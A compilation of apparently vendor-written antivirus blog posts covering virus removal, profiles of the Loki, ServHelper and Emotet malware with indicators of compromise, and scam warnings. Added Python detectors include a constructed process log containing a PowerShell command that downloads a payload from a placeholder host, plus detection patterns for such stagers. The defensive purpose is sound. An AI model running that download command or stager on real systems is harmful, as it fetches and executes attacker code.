How to Remove Computer Viruses

How to Remove Viruses from Your Computer

Almost everyone who owns a computer is likely to run into trouble with viruses sooner or later – in 2023 alone, there were more than 6 billion malware attacks worldwide. Viruses and other types of malware can wreak havoc on computers, causing anything from minor inconveniences to severe data breaches, and even disrupting global organizations and infrastructure. While modern operating systems have improved their defenses over time, viruses continue to evolve as well. In this guide, we’ll cover how to recognize virus red flags, how to remove viruses from your computer, and ways to keep your system safe from future infections.

Identifying the signs of a virus infection

Before we explain the virus removal steps, let’s look at the symptoms of a computer virus. Knowing the warning signs can help you catch a virus early, preventing it from causing unchecked damage to your computer and data. Malware is designed to operate covertly, but here are the things that could signal its presence.

Unexplained system behavior

An unexpected deterioration in the performance of your computer should always be a red flag. If it’s slower than it should be, freezing frequently, or crashing for no identifiable reason, it might be the work of a virus. This happens because malware often consumes a lot of your computer’s processing power.

Viruses can also affect your system settings. If you notice changes to your desktop background, unfamiliar icons, or your web browsing suddenly displaying a different homepage or new toolbars, it could be a sign that malicious software has modified your settings without your permission or knowledge.

Unusual pop-ups

A classic sign of a computer virus is an unexpected influx of pop-ups. More than just an annoyance, these pop-ups will often pose as antivirus tools themselves in an attempt to get you to click on them. By doing this they can lure unsuspecting users into downloading more malware, or disclosing personal information. Always treat any unfamiliar pop-ups suspiciously, and avoid clicking on any links or following their instructions.

Step-by-step virus removal process

If the warning signs above sound suspiciously familiar to you and you suspect your computer has a virus, taking immediate action is crucial. The following steps will help you remove viruses and any other malware that may be hiding on your system.

Enter safe mode

The first step in the virus removal process is to put your computer into safe mode. Safe mode is a diagnostic mode that limits your computer to running only essential programs and services, making it harder for viruses to operate and limiting the damage they can cause. By reducing background processes, safe mode also makes it easier to identify and remove viruses. The way you enter safe mode will differ depending on your operating system:

  • Windows: Restart your computer and press either the F8 or F11 key as it boots up.
  • Mac: Restart your computer and hold down the Shift key as it turns back on.

Run a full antivirus scan

Once you’re in safe mode, carry out your chosen form of antivirus scanning. Running a full scan ensures that your antivirus software can comb through your entire system to locate any threats. If you don’t have an antivirus program installed, find one that’s reputable and install it right away. A full system scan may take some time, so be prepared to wait.

Delete temporary files

Many viruses hide in the temporary files created by browsers, operating systems, or third-party apps, so cleaning these out is an essential but often-overlooked part of the removal process. Wait until your scan has completed before doing this – deleting files while the scan is running might disrupt the process and prevent it from being effective.

Quarantine and remove any threats

Once the scan is complete, it will generate a report for you to read. Your antivirus software will categorize threats based on their severity and recommend a course of action for each one. For files that can’t be safely deleted, your antivirus program will usually provide an option to quarantine them. This isolates any infected files, keeping them on your computer but preventing them from causing any harm.

For most threats, the best course of action is to delete them. Follow your antivirus software’s recommendations to remove the harmful files. Once you’ve done this, it’s a good idea to restart your computer and run another scan to make sure the virus has been fully removed.

Protecting your computer from future viruses

Here are some further computer virus protection tips we would recommend you follow.

Keep your software updated

A simple way to give yourself the best chance of avoiding viruses is to keep all of your computer software updated. Operating systems, antivirus software, and any apps you use will all receive regular updates that include vital security patches and improvements designed to block the latest threats.

If you struggle with remembering to check for updates, it’s usually possible to enable automatic updates. This way, your software will stay current without requiring any extra effort on your part.

Avoid unverified downloads

The internet is full of enticing downloads, from exciting new software to interesting-looking files. Unfortunately, there are often viruses nestled among these dazzling distractions. Avoid downloading software or files from sites you don’t trust, and never open attachments from unknown senders. Stick to official websites or app stores for any software you need, and question any email attachments you receive unexpectedly, even those from trusted sources – the sender’s account might have been compromised.

Run regular scans

Even if you do everything right, there’s nothing that can make you one hundred percent immune to every possible threat. That’s why running regular scans is so important to maintaining the health of your computer. These scans can be scheduled to run automatically and send you periodic reports, so they won’t interrupt your regular computer usage. This proactive approach will help you to nip any viruses in the bud, before they have a chance to cause damage.

Show viruses the door

With the antivirus software available today, running into trouble with computer viruses doesn’t need to be a death sentence for your computer, or mean irreparable damage to your data. Being able to recognize the warning signs and follow the above steps puts you in the best position possible to handle malware in its many shapes and forms.

Your antivirus software is your best line of defense against malware – so choose it wisely, keep it updated, and scan regularly. For software that secures your peace of mind as well as your system, think SUPERAntiSpyware.

How to Scan Your Computer for Viruses

It’s often said that a poor workman blames his tools – but, when it comes to computers, the tools with which we manage so many aspects of daily life, maintaining their health is of the utmost importance. Viruses and other types of malware are constantly seeking to sneak into our systems in the hopes of stealing sensitive information, slowing down performance, and sometimes even causing irreparable damage. This guide will walk you through recognizing the signs of a computer virus and how to run the scans that can confirm your suspicions.

Signs your computer may have a virus

One of the most challenging aspects of computer viruses is the fact that they can so often go unnoticed. Working in the background, quietly wreaking havoc, viruses and malware can lurk on your device while you go about your day-to-day tasks. Things you might brush off as annoying but benign occurrences – crashes, lag, pop-ups – can actually be the symptoms of a computer virus. This is why it’s important to recognize the signs.

Slow performance and frequent crashes

One of the first signs of a potential infection is a sudden drop in your computer’s performance. Viruses use up valuable resources such as memory and processing power, sapping the energy usually devoted to other programs and processes. If your computer starts to feel sluggish, freezes unexpectedly, or crashes without warning, this could indicate that it has been infected with a virus. If any of these issues start to occur for no apparent reason, it’s worth further investigation.

Unexpected pop-ups and redirects

Pop-up ads are a familiar nuisance, but a sudden surge of them, especially if they appear when you’re not actively browsing the web, should be seen as a major red flag. Some types of malware specifically trigger pop-ups or redirect you to suspicious websites in order to trick you into downloading them. Any time your browser opens a new tab unexpectedly, or repeatedly directs you to sites you didn’t intend to visit, there’s a good chance that some sort of virus is at work.

How to scan for viruses

You’ve recognized the warning signs – now comes the time to either confirm your fears, or provide yourself with peace of mind. During a scan, your device will be checked thoroughly for any potential harmful software – system files, programs, downloads, and other such components will be searched for any signs of malicious activity. Here’s how it’s done.

Step 1 – Install a reputable antivirus software

If you don’t already have one, your first step is to find yourself a reliable antivirus program. Not all antivirus software is created equal, so look for one that’s highly rated by experts and offers regular updates to combat ever-evolving online threats. The best antivirus software typically provides a comprehensive defense, scanning for viruses, malware, spyware, and other forms of malicious software.

Step 2 – Run a full system scan

Once your chosen software is installed, you’ll want to run a full system virus scan. A full scan sweeps every corner of your computer, ensuring that no stone is left unturned in its search for malicious software. Full scans can take a while, potentially even hours, depending on your computer’s size and power, but they’re worth the time investment, especially if you have never scanned your computer before.

Step 3 – Check scan reports and take action

Most antivirus software will provide you with a virus scan report once the scan is complete. This report will list any detected threats and provide you with options for how to handle them. It might even provide a list of potential vulnerabilities, allowing you to stop viruses from gaining access to your system in the first place. If your scan does find any existing threats, you’ll usually be given options along the lines of quarantining, deleting, or ignoring them. Quarantining a virus isolates it, preventing it from causing further harm, and deleting it removes it from your computer. Always act on any flagged items, and don’t ignore alerts unless you’re absolutely sure the file is safe.

The different types of scan

Most software will provide you with a few different options for what kind of scan you want to run. Each scan has its strengths, and some are more applicable than others depending on the situation.

Quick scans vs full scans

The shorter alternative to a full system virus scan, a quick scan will check the most common areas where malware can be found, such as system memory, startup files and download folders. Quick scans are ideal for routine check-ups, but aren’t as thorough as full scans.

Custom scans

If there’s a particular area of your computer that’s causing you concern, or if you want to isolate a scan to a specific folder or external drive, you can often customize your scans to accommodate this. Because the scan will only be aimed at a precise location, it will take less computing power and often be quicker than a full scan.

Best practices for regular virus scanning

Knowing how to scan your computer for viruses is one thing – doing it on a regular basis is a habit you have to develop. Here are some of the best practices for keeping your computer virus-free.

Schedule regular scans

Setting up scheduled virus scans is a great way to alleviate the pressure of having to remember to run regular manual scans. Scheduling ensures that scans happen automatically, and can be set to run at times when you won’t be using your computer, so you’re not sitting around waiting for a scan to finish when you could be doing other things. A popular option is to schedule a quick scan once a day, and a weekly full system virus scan.

Keep your antivirus software updated

Your antivirus software is only as effective as its latest update. New viruses are created on a daily basis, often built specifically to combat the latest antivirus defenses, so it’s important that antivirus providers regularly update and patch their programs with the latest improvements. Regularly checking your software for the latest update is as important as running regular scans.

Plan your scans with SUPERAntiSpyware

To summarize:

  • There are lots of places for viruses to hide within the confines of your computer, and learning to recognize the warning signs can give you a valuable heads up.
  • Using antivirus software to run scans will enable you to detect any viruses or malware lurking undetected in your device.
  • Utilize both full system virus scans and quick scans.
  • Running scheduled virus scans can help to ensure round the clock protection, even for the forgetful among us.
  • Software updates keep you safe from the latest threats.

Protecting your computer doesn’t need to be difficult or confusing – with the right tools, it’s actually pretty straightforward. Get in touch with us today to find out more about our anti-spyware products.

How to remove Loki

Delivered through malicious spam campaigns, Loki focuses on stealing credentials from the victim’s computer and runs a keylogger, a common hacking method. Loki also communicates back to a Command and Control server (C&C) to report what it finds and to receive commands if needed.

How it works

Loki, named after the creator’s username Lokistov, is delivered to users through a variety of channels, but the most common is malicious email, which can come in a variety of forms. The most common strategy is the familiar “invoice” style email that attempts to get the potential victim to open the attachment. Once opened, the “invoice” will try to run embedded macros or get the user to follow a link to a downloader. One example of such an “invoice” can be found below.

[Image: invoice document prompting the user to click “Enable Content”]

If the potential victim were to click “Enable Content,” Loki would be installed and start gathering data. This is a common attack vector and was used, albeit in a more complex way, by Emotet.

This is not the only way Loki can be delivered, however. Because Loki can be purchased by any malicious user, each buyer will deliver it in whatever way is most cost effective for them.

Loki focuses primarily on credential-stealing and boasts the ability to steal from 80 programs. The most notable are all major browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Microsoft Edge
  • Microsoft Internet Explorer
  • Opera Software’s Opera browser

In addition to this already worrying list, Loki is able to go after many alternative versions of these browsers such as:

  • 8pecxstudio’s variant of Firefox, Cyberfox
  • Google’s open-source browser Chromium
  • Independently developed Firefox fork, WaterFox
  • Nichrome

In addition to browsers, Loki can go after FTP clients, Microsoft Outlook, and independently developed SuperPuTTY. This list will likely be expanded in future campaigns to include more commonly used programs if vulnerabilities are found.

After connecting and confirming the presence of its C&C server, Loki launches a keylogger in a separate thread. This keylogger records every button press of the keyboard during its operation and can be used to reveal other passwords and usernames that may not have been stored in a program it can access. This is then bundled with any other data it retrieved.

Once the data is gathered, it is compressed and sent to the C&C server hosted by the malicious actor. These servers are normally shut down quickly after a new campaign has been identified, but they can remain active for days or weeks at a time, giving the operators plenty of time to move the gathered data somewhere else and sell it.

Who is affected?

Loki can be bought on the dark web fairly cheaply. The last known price at the time of this writing was $70. The consequence of this is that Loki can be used to target anyone. The upside of this availability is that it makes it much easier for anti-malware companies to obtain samples and stop it.

Indicators of Compromise

  1. C:\Users\admin\AppData\Local\Temp\saver.scr
  2. a.doko.moe
  3. MD5: 500F84B83BE685009C136A67690CA0C3

What you can do

If you or someone you know is infected with the Loki malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Loki from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech03 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How To Remove Loki

  1. Restart the infected computer in safe mode without networking.
  2. Search through the items in the Indicators of Compromise section above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

How to remove ServHelper

ServHelper is a new backdoor with a downloader variant, which first appeared in November of 2018. Named by the threat actor “TA505,” ServHelper spreads through email campaigns using a quantity-over-quality approach that has proven to work, albeit less effectively than the Emotet strategies discussed here. ServHelper seems to be largely targeted toward businesses but could change to focus on individuals in future campaigns.

How does ServHelper work

ServHelper is downloaded through Microsoft Word documents with macros. The documents often pretend to be invoices, though they may take other forms such as, but not limited to: greeting cards, complaints, or details from your bank. These documents attempt to convince the victim to enable macros in them by saying that the content cannot be viewed until macros are enabled. If the victim clicks the Enable Content button, the infected document runs code that downloads ServHelper to the computer. You can learn more about how to protect yourself here. An example is shown below:

[Image: infected Word document prompting the user to click “Enable Content”]

Another method employed by ServHelper is to distribute PDF files that claim you must follow the link provided to update your PDF viewer. These links instead reach out to a download server that infects anyone who visits. The end result is the same regardless of whether the victim gets the infection from a Word document or a PDF.

Once installed, ServHelper does one of two things.

  1. Establishes a remote-control session that allows the malicious actor to control the infected computer from anywhere. To accomplish this, the malware talks to a Command and Control server (C&C) from which it takes its commands. Some of the notable commands include: the ability to kill itself and remove traces of itself from the computer, the ability to copy users’ browser profiles, and the ability to execute a command shell. This allows the attackers to gain access to your PII as well as any passwords, usernames, and bank account information, using advanced hacking methods.
  2. Drops another piece of malware known as FlawedGrace. ServHelper recently removed some of its capabilities (in this version only) to instead focus on dropping this malware. FlawedGrace acts as a remote-access Trojan providing similar functions to ServHelper.

Who is affected?

ServHelper largely targets businesses, so most of the emails are designed to look like emails you would see in your day-to-day business, such as invoices. Despite this active focus, it’s entirely possible for computers outside of a business to be infected and extorted, so protection is paramount.

Indicators of Compromise

ServHelper makes several changes that indicate whether a computer has been infected.

  1. The most noticeable one is the C:\Windows\ServHelper.dll that is dropped in the Windows folder.
  2. Unusual scheduled startup tasks are always noteworthy, and ServHelper uses them to start itself every time a victim’s computer boots.
  3. C:\PROGRAM FILES\COMMON FILES\SYSTEM\WINRESET.EXE
  4. crl.verisign[.]com/pca3[.]crl
  5. hxxp://ocsp.verisign[.]com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D
  6. hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl[.]cab
  7. IP: 104.81.60.211
  8. IP: 104.81.60.51
  9. IP: 2.17.157.9

Note that items 4 to 6 are certificate-revocation and Windows root-certificate update endpoints that legitimate software also contacts, so on their own they are weak indicators; the dropped files and the scheduled task are the ones to look for first.

What you can do

If you or someone you know is infected with the ServHelper malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove ServHelper from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech02 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How to Remove ServHelper

  1. Restart the infected computer in safe mode without networking.
  2. Search through the Indicators of Compromise listed above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

How to remove Emotet

You may have heard of the Trojan Emotet before. Since first appearing back in 2014 stealing banking information, it has evolved into a multi-faceted threat that targets everyone. It uses social engineering through emails to attempt to convince the user to open a Microsoft Word document and run its malicious macros. Even more worrisome is that once Emotet has infected a target, it attempts to take over the victim’s Microsoft Outlook desktop application. If successful, Emotet goes through all sent emails and contacts and sends out a new wave of spam emails. Only this time, the potential victims are receiving the message from a trusted email address.

A campaign from Emotet over the Christmas season read like a friend sending a friendly season greeting.

Dear <name>,

You make the stars shine brighter and the winter days warmer just by being in my life. Merry Christmas to my favorite person in the world.

Merry Christmas and a wonderful New Year!

Greeting Card is attached

A lovely thing about Christmas is that it’s compulsory, like a thunderstorm, and we all go through it together. Garrison Keillor

While not limited to invoices or Christmas cards, these emails attempt to get the user to click the download link and then to open the document. In the email mentioned above, the target may be fooled into thinking that the attached greeting card is legitimate. The document actually contains a malicious macro, an embedded script. While macros were initially designed to help automate keystrokes and mouse movements, they were quickly abused by nefarious virus creators. The infection cannot run on its own, since Microsoft disabled macros by default more than a decade ago to help stop these malicious scripts. Instead, Emotet uses a few techniques to get the user to re-enable macros. Examples can be seen below.


The picture urges the user to click the Enable Content button, implying that they cannot view the Word document until they do so. You may have already noticed that the bar itself says that macros have been disabled, and the Enable Content button will, in fact, allow them. The moment that Enable Content button is clicked, the macros will start, and in seconds you will be infected. Even worse, in most cases you will have no indication from this point forward that anything is wrong. In one test case we briefly had a command window appear:


This window lasted less than two seconds before disappearing. This attack vector is not unique to Emotet though. In fact, it has been used by a number of ransomware attacks in the past. If you ever see a document you didn’t expect to receive, you should always be extremely cautious with it and you should never enable macros without a very good reason.

How it works

Emotet is an evolving malware that has been known to primarily spread itself through email spam campaigns. Emotet itself does not attempt to do much harm; instead, it opens the door for other malware that pays the doorman on the way in. It achieves this by using what is known as a Command and Control server (C&C): Emotet requests instructions from its C&C server, which issues a new command. This command could be anything from “grab this malware sample and run it” to “tell me what passwords are stored in the user’s browser.” Emotet can receive updates and new capabilities in this way as well, which is why, if Emotet has infected your computer or network, it should be removed as quickly as possible.

Emotet doesn’t stop at the first computer infected though. Once it’s on a network, it will attempt to get to all computers it’s connected to through a brute-force attack. Unless strong passwords are enforced on machines and all known vulnerabilities are patched, a single installation of Emotet can cause every computer in the network to become infected. Emotet is often updated with new exploits as they are found, meaning that while it may not be successful at first, it will keep trying until it finds something that does work.

Code

We won’t go into too much depth on the actual code itself, but a brief step-by-step walkthrough can be useful to get a better understanding on how this malware works.

1. In the Word document there is a VBA script that is obfuscated so that you cannot read it at a glance. All this code does is launch a command shell, which then launches PowerShell, Windows’ more capable scripting shell.

2. Using PowerShell, the script attempts to download the core Emotet payload from a large variety of distribution websites.

3. The randomly named payload will then reach out to the main server and request a command. The command will change based on the campaign that is running: it could go grab new malware, or it could attempt to use your own email address as a way to spread itself.
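The process chain in steps 1 and 2 (Word launching cmd.exe, which launches PowerShell with a download or encoded command) is something endpoint logs can catch. The following is an added example, not code from the original post or from SUPERAntiSpyware: it runs a simple detector over constructed process-creation log lines in an assumed pipe-separated format loosely modelled on Sysmon event ID 1 fields.

```python
"""Flag the Office -> cmd.exe -> PowerShell download chain in process logs.

Added example (not the page's or SUPERAntiSpyware's code). Assumed log format:
one process-creation event per line, '<time>|<parent_image>|<image>|<command_line>'.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Substrings typical of PowerShell download stagers (assumption, not an exhaustive list)
DOWNLOAD_MARKERS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|"
    r"-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)


def basename(path):
    """Last path component, accepting either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def parse_line(line):
    """Split one log line into a dict; return None for malformed lines."""
    parts = line.rstrip("\n").split("|", 3)
    if len(parts) != 4:
        return None
    time, parent, image, cmdline = parts
    return {"time": time, "parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}


def classify(event):
    """Return the list of reasons an event looks like a macro stager (empty if benign)."""
    parent = basename(event["parent"])
    image = basename(event["image"])
    reasons = []
    if parent in OFFICE_PARENTS and image in SHELLS:
        reasons.append(f"office app {parent} spawned {image}")
    if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_MARKERS.search(event["cmdline"]):
        reasons.append("powershell command line contains a download or encoded-command marker")
    return reasons


def find_macro_stagers(lines):
    """Return (time, image, reasons) for every suspicious event in the log."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        reasons = classify(ev)
        if reasons:
            alerts.append((ev["time"], ev["image"], reasons))
    return alerts


# Constructed sample log; hosts, paths and times are made up for the demonstration.
SAMPLE_LOG = [
    r"09:14:02|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd /c powershell -nop -w hidden -enc SQBFAFgA",
    r"09:14:03|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -enc SQBFAFgA",
    r"09:15:10|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\todo.txt",
    r"09:16:30|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-ChildItem C:\Users",
    r"09:20:00|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/payload','C:\Users\Public\123456.exe')",
]

if __name__ == "__main__":
    for time, image, reasons in find_macro_stagers(SAMPLE_LOG):
        print(time, basename(image), "; ".join(reasons))
```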

Who is affected

Many people assume that they will not be targets of malware campaigns. Emotet, though, targets everyone equally: it has the simple goal of getting on every machine it can and then getting paid to let other, more targeted malware come in behind it. If your email address has ever been sold, disclosed in a breach, or was on a friend’s email list when they got infected, then it’s possible you will receive a malicious email from them.

Indicators of infection

The main location for the executable is in C:\Users\<name>\AppData\Local\ and then whatever new name Emotet decides to use. One we have seen often is archivessymbol, but this will change. If you see something in this folder you don’t know about, it’s important to run a scan.

Versions of Emotet can also drop files onto your computer in C:\Users\Public or C:\Users\<username>.

These files generally have 5-6 randomly generated numbers in the file name, followed by .exe. These are not actually executable files, but HTML documents that are used to generate revenue for the blackhats by simulating clicks on web advertisements.
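Because the file name extension says nothing about what a file really is, the practical check for the side-files just described is to compare the name pattern with the file’s first bytes. This added example (not the page’s or SUPERAntiSpyware’s code) builds a constructed sample folder standing in for C:\Users\Public and flags digit-named .exe files that contain HTML instead of a Windows executable.

```python
"""Find digit-named .exe files that are really HTML, as described for Emotet.

Added example, not code from the original post or from SUPERAntiSpyware.
The sample folder is constructed in a temp directory so the script runs offline.
"""
import os
import re
import tempfile

DIGIT_EXE = re.compile(r"^\d{5,6}\.exe$", re.IGNORECASE)


def looks_like_pe(header: bytes) -> bool:
    """Every Windows executable starts with the DOS stub magic 'MZ'."""
    return header[:2] == b"MZ"


def looks_like_html(header: bytes) -> bool:
    """Crude HTML sniff on the leading bytes, ignoring whitespace and case."""
    text = header.lstrip().lower()
    return text.startswith((b"<!doctype html", b"<html", b"<script", b"<head"))


def inspect_file(path):
    """Return a reason string if the file matches the indicator, else None."""
    name = os.path.basename(path)
    if not DIGIT_EXE.match(name):
        return None
    with open(path, "rb") as f:
        header = f.read(512)
    if looks_like_pe(header):
        return None  # a genuine executable; still worth an AV scan, but not this indicator
    if looks_like_html(header):
        return "digit-named .exe containing HTML (Emotet ad-fraud side-file pattern)"
    return "digit-named .exe that is not a PE file"


def scan_folder(folder):
    """Return (file name, reason) for every file in the folder that matches."""
    hits = []
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        if os.path.isfile(path):
            reason = inspect_file(path)
            if reason:
                hits.append((name, reason))
    return hits


def build_sample_folder():
    """Constructed test data standing in for C:\\Users\\Public (made up for this example)."""
    folder = tempfile.mkdtemp(prefix="emotet_demo_")
    samples = {
        "483921.exe": b"<!DOCTYPE html><html><body><script>/* simulated ad clicks */</script></body></html>",
        "77120.exe": b"  <html><head><title>x</title></head></html>",
        "55555.exe": b"MZ\x90\x00" + b"\x00" * 60,  # a genuine PE header, not flagged
        "report.exe": b"<html></html>",  # HTML, but the name pattern does not match
        "notes.txt": b"shopping list",
    }
    for name, data in samples.items():
        with open(os.path.join(folder, name), "wb") as f:
            f.write(data)
    return folder


if __name__ == "__main__":
    for name, reason in scan_folder(build_sample_folder()):
        print(f"{name}: {reason}")
```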

What you can do

If you or someone you know is infected with the Emotet malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Emotet from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech01 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

Emotet has also been known to exploit a vulnerability in Windows called EternalBlue. Microsoft has issued a patch for this, and applying this patch can help protect you from Emotet as well as other malware that uses this exploit.

How to Remove Emotet

  1. Restart the infected computer in safe mode without networking
  2. Search through the Indicators of infection and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

Watch out for fake USPS delivery emails!

Fake USPS Delivery Emails?

We at SUPERAntiSpyware have been alerted to scam emails hitting users, claiming to be from the US Postal Service (USPS), that contain a link that will infect them with malware. One of the sender addresses being used by this scam is notice@ussp(DOT)com

The subject line of the email is typically “Delivery notification – Parcel delivery *NUMBER* failed”. The message asks the user to call the number on the shipping notice supposedly left at their doorstep (there is none!) to arrange a new delivery, and includes a link that claims to show the delivery notice online on the USPS website.

This is a fake link to a malware infested website.

If you see a link in a suspicious email such as this do not click the links or open the attachments no matter how innocent they sound. If it claims to be from an official organization, call them and ask if the email is legit. Better safe than sorry!

Tax Season is here – Watch out for Identity Stealing Spyware!

Keep your personal information safe this tax season by running a free scan with SUPERAntiSpyware Free Edition.

We want to remind everyone that tax season is a time of increased attacks in the form of spyware, various methods of phishing, and scams. Spyware and malware authors significantly increase their activity during tax season in order to steal data, withdraw money from bank accounts, steal credit cards and passwords, and commit other malicious acts.

Watch out for Identity Stealing Spyware!

During this tax season it’s important to do a few things to help protect yourself online:

1) Make sure your Operating System and software applications such as web browsers and email clients are up to date.

2) Run a Complete Scan with SUPERAntiSpyware regularly with the latest updates, at least twice a week during this period of increased activity.

3) Be cautious before visiting strange websites, or opening strange email attachments. Think before you click!

4) Manually erase, or use privacy software to delete, sensitive data from your PC. Spyware cannot steal what isn’t there!

5) Look out for spam and phishing emails impersonating government, bank, or tax company officials asking for sensitive information.

Do you have any security recommendations that help you stay safe during the tax season? Feel free to leave a comment below!

SUPERAntiSpyware Team

Facebook Malware Attack

Facebook Malware Attack Warning

We’re receiving reports that Facebook is being used as a new vector for malware attacks, specifically as a means to distribute the Locky ransomware. While the ransomware itself is not hosted directly on Facebook, this new version is delivered in a peculiar way.

The attack starts with a presumably infected machine sending a message to everyone on its owner’s friends list. The message is actually an SVG (Scalable Vector Graphics) file masquerading as an image that you download to view. Once the file has been downloaded and opened, the payload is delivered. Because of the way SVG files work, JavaScript can be embedded in them, and it will run when the file is opened in a modern web browser. That JavaScript then directs the user to a website that mimics YouTube, but with a completely different URL.

Once on that site, a popup asks the user to install a certain browser extension in order to view the video. After the extension has been installed, the attackers have the ability to view and alter data on the websites you visit, as well as access your Facebook account in order to message all of your friends with the same SVG file.
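The reason an “image” can do this is that an SVG file is XML, and the SVG standard allows script elements, event handler attributes and javascript: links inside it. The following check, an added example that is not SUPERAntiSpyware’s code, flags an SVG attachment that carries any of that active content before anyone opens it in a browser; both sample files are constructed for the example.

```python
"""Flag SVG files that carry active content (script elements, on* event
handler attributes, javascript: URLs, foreignObject). A plain picture has none
of these. Added example; the two sample SVGs below are constructed."""
import xml.etree.ElementTree as ET


def _local(name):
    # Strip the namespace from "{http://www.w3.org/2000/svg}script" -> "script"
    return name.rsplit("}", 1)[-1].lower()


def svg_active_content(svg_bytes):
    """Return a list of findings describing active content in an SVG document.
    An empty list means the file looks like a static image."""
    findings = []
    root = ET.fromstring(svg_bytes)
    for elem in root.iter():          # document order, root included
        tag = _local(elem.tag)
        if tag == "script":
            findings.append("script element")
        if tag == "foreignobject":
            findings.append("foreignObject element (can embed HTML)")
        for attr, value in elem.attrib.items():
            a = _local(attr)          # handles xlink:href as well as href
            if a.startswith("on"):
                findings.append(f"event handler attribute {a} on <{tag}>")
            if a == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in href on <{tag}>")
    return findings


# Constructed samples: a harmless square, and a file shaped like the lure
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="blue"/></svg>"""

SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="go()">
  <script>/* constructed marker; a real lure would redirect the browser */</script>
  <a xlink:href="javascript:go()"><text>play video</text></a>
</svg>"""

if __name__ == "__main__":
    for label, data in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, svg_active_content(data) or "no active content")
```

A mail gateway or download scanner can quarantine anything that returns a non-empty list; a legitimate picture sent as an SVG does not need any of these constructs.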

The payload is delivered through the Nemucod downloader Trojan, which has been known to download copies of Locky onto victims’ PCs.

While Google and Facebook have been made aware of this attack, it is possible that proper remediation could take time. The best course of action if you receive such a message is to ignore it, clear your conversation history with that person, and report them to Facebook as having a compromised account.

If you have already been infected by this attack, there’s not much you can do beyond removing the offending extension in Chrome: go to Menu > More Tools > Extensions and check whether an extension named Ubo or One is listed. This is also a good time to remove any unknown extensions that are installed.

Remember, once you have been locked out of your system by ransomware, your options for recovery are only as good as the backups you have made. Keep your backups up to date, and save your data to an external drive as often as possible. Once a ransomware infection has taken place, any drive attached to your machine or network is at risk. Never keep your backup drives attached to your machine when they are not in use.

Typosquatting: Another front of malware attacks

Typosquatting is a type of internet scam that relies on end users making mistakes, such as spelling errors or entering the wrong domain name when typing a website’s URL. It is also commonly known as URL hijacking. There are many motivations for a hijacker to take the Typosquatting approach to deceiving unsuspecting victims:

1) To redirect web traffic to their own or a competitor’s product.

2) To install malware on the user’s machine, typically ad-serving malware.

3) To freeze the web browser for a fake tech support scam, scaring the user into calling a fake tech support number by claiming the user has a virus infection. These scams can cost users hundreds of dollars.

4) To steal user information by running a phishing scheme that mimics a legitimate website.

5) To make revenue from the user clicking on advertisements (either in plain sight or disguised as legitimate search links) on the Typosquat website.

6) To blackmail or strong-arm the company they’re Typosquatting into purchasing the website from the Typosquatter.

A scammer who runs a Typosquat scam typically registers a website address whose spelling is close to the legitimate website’s address. This is typically something simple like omitting a letter, adding a letter, or using a different Top Level Domain. For example, if a user wants to go to our website, they may end up typing superaantispyware[dot]com with a double a. This will show the user a Typosquatting website such as this:

